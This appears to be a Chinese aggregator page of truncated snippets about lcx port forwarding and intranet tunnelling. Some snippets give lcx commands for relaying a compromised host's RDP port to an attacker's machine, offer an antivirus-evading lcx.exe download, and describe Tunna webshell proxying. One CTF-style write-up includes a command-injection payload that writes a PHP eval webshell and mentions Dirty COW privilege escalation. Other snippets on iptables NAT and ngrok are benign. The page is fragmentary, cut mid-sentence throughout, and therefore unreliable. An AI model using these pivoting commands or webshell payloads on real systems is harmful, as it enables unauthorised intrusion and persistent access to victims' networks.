lcx 内网转发】的更多相关文章

把放置到已经控制的内网主机 执行 内网主机输入命令lcx.exe -slave 外网ip 外网端口 内网ip 内网端口lcx.exe -slave 30.1.85.55 2222 127.0.0.1 3389 外网主机输入命令lcx.exe -listen 2222 3388 打开 mstsc ip:3388…
作者: 小健 本机: lcx -listen 2222 3333 2222为转发端口,3333为本机任意未被占用的端口 肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389 119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口 3389连接时格式 127.0.0.1:3333 今天刚刚第一次使用,特此共享! 另外提供我的免杀lcx.exe 提供给大家下载. 下载是:http://www.xi…
传输层技术包括TCP隧道.UDP隧道和常规端口转发等.在渗透测试中,如果内网防火墙阻止了指定端口的访问,在获得目标机器的权限后,可以使用IPTABLES打开指定端口.如果内网中存在一系列防御系统,TCP.UDP流量会被大量拦截. 1.实验环境 window 7 (VPS机器):192.168.4.137 window 7(受害者):1.1.1.10 monowall防火墙:只允许通过TCP/UDP数据 2.网络拓扑图 内网win7通过lcx.exe,将自己主机的远程端口3389的数据流量通过端口…
Tunna和reduh原理一样.. 使用方法: 上传源码包中文件夹webshell下的脚本至网站目录 然后本地进行连接上传的webshell即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -r 3389 -v 这样就转发了webshell所在主机的3389到你本地的1234上,本地直接远程127.0.0.1:1234即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -a…
http://www.jb51.net/hack/58514.html http://blog.chinaunix.net/uid-756931-id-353243.html http://blog.163.com/czg_e/blog/static/46104561201552423342331?ignoreua http://www.noah.org/wiki/SSH_tunnel http://www.myhack58.com/Article/60/63/2013/38396_3.htm…
介绍 通过iptables做nat转发实现所有内网服务器上网. 操作 首先开启可以上网的服务器上的内核路由转发功能.这里我们更改/etc/sysctl.conf 配置文件. [root@web1 /]# sed -i '$a net.ipv4.ip_forward = 1' /etc/sysctl.conf [root@web1 /]# cat /etc/sysctl.conf # sysctl settings are defined through files in # /usr/lib/s…
Sunny-grok 申请地址:http://www.ngrok.cc ngrok.cfg配置: server_addr: "server.ngrok.cc:4443" auth_token: "xxxxxxxxx" #授权token,在www.ngrok.cc平台注册账号获取 tunnels: sunny: subdomain: "yueshen1314" #定义服务器分配域名前缀,跟平台上的要一样 proto: http: 4040 #映射端…
1.下载解压ngrok:https://ngrok.com/download 2.执行ngrok会打开控制台 3.输入命令,开始映射本地的8080端口 ngork http 8080 控制台会返回一个url,该url就是映射到你电脑的8080端口. 每次重启ngrok或电脑,返回的url都是随机的. 有部分教程说注册获得token,有了token就允许自定义三级域名,但我尝试了提示需要付费才允许自定义三级域名.…
更具实验文件知道存在源码泄露  下载源码进行源码审计 发现admin账号 查看user.php 发现mysql 账号 端口 对登录后源码进行审计 发现上传文件的两处漏洞 对 fiel name 可以 %00 截断 上传一句话木马   对file name   shell_exec 未对参数过滤 可以拼接执行 命令 写一句话 例如 '|| echo "<?php eval($_POST[1])?>" >/var/www/html/2.php||' 菜刀连接 上传脏牛提权…
package main import ( "io" "log" "net/http" "strings" ) func main() { localHost := "127.0.0.1.8001" targetHost := "127.0.0.1:80" httpsServer(localHost, targetHost) log.Fatalln("http server d…